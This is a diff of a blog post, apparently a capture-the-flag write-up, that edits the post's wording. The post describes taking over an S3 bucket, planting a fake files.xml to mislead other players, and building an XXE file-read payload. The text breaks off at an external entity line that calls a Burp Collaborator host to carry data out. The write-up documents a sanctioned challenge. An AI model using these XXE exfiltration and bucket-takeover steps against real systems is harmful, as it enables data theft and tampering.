0xDexter0us/blog/content/posts/ccc-h1ctf.md

 {{< image src="/images/ccc-h1ctf/image-20210603223732544.png" position="center" style="border-radius: 5px;" >}}

-Since the CTF is based around todayisnew's methodology first thing I did was to takeover that S3 bucket and uploaded a PoC at `https://h1-6hin8w.s3.eu-west-2.amazonaws.com/poc.dexter0us.txt` then I had an evil idea.
+Since the CTF is based around todayisnew's methodology, first thing I did was to takeover that S3 bucket and uploaded a PoC at `https://h1-6hin8w.s3.eu-west-2.amazonaws.com/poc.dexter0us.txt` then I had an evil idea.

 {{< image src="https://media1.tenor.com/images/c7226c3298a1885eacac632bf3d6cf74/tenor.gif?itemid=12538746" position="center" style="border-radius: 5px;" >}}

-why not make a files.xml file and upload it to bucket and have some fun with other CTF players, so we played an innocent prank on other CTF players.
-We encoded Rick Astley's song in base64 and uploaded it.
+Why not make a fake `files.xml` file and upload it to bucket and have some fun with other CTF players?,So we played an innocent prank on other CTF players by encoding a rick roll URL in base64 and uploading it in files.xml.

 {{< image src="/images/ccc-h1ctf/image-20210603222925432.png" position="center" style="border-radius: 5px;" >}}

-Now from the downloaded xml file we discovered a new domain `patopirata.com` after digging a bit and some directory bruteforcing on that new domain we discovered a new file `http://patopirata.com/info.php` while later turned out to be another rabbit hole.
-But the xml file in itself was a big hint  **XXE**
+From the downloaded xml file we discovered a new domain `patopirata.com`.
+After some digging and directory bruteforcing on that new domain, we discovered a new file `http://patopirata.com/info.php` although this turned out to be another rabbit hole.
+However, the xml file in itself was a big hint: **XXE**

 {{< image src="/images/ccc-h1ctf/image-20210603224127421.png" position="center" style="border-radius: 5px;" >}}
 ---

 {{< image src="/images/ccc-h1ctf/image-20210603224304860.png" position="center" style="border-radius: 5px;" >}}

-After falling into two rabbit holes we started to test the main application, we discovered that when you create a login on the site you get a unique hash e.g. `https://ccc.h1ctf.com/u/2h8x50` from that `error_-_-_log.txt` file we guessed that we must have to create an S3 bucket with our unique hash to store our own `files.xml` file to trigger out XXE payload.
+After falling into two rabbit holes we started to test the main application, we discovered that when you create a login on the site you get will receive an unique hash e.g. `https://ccc.h1ctf.com/u/2h8x50` from that `error_-_-_log.txt` file we guessed that we must have to create a S3 bucket with our unique hash to store our own `files.xml` file to trigger out XXE payload.
 With a bit of trial and error we came up with this XXE LFI payload:

 ```xml-dtd
 <!ENTITY % filepd SYSTEM "https://o3s52u8tar80ojlzicatifurxi39ry.burpcollaborator.net">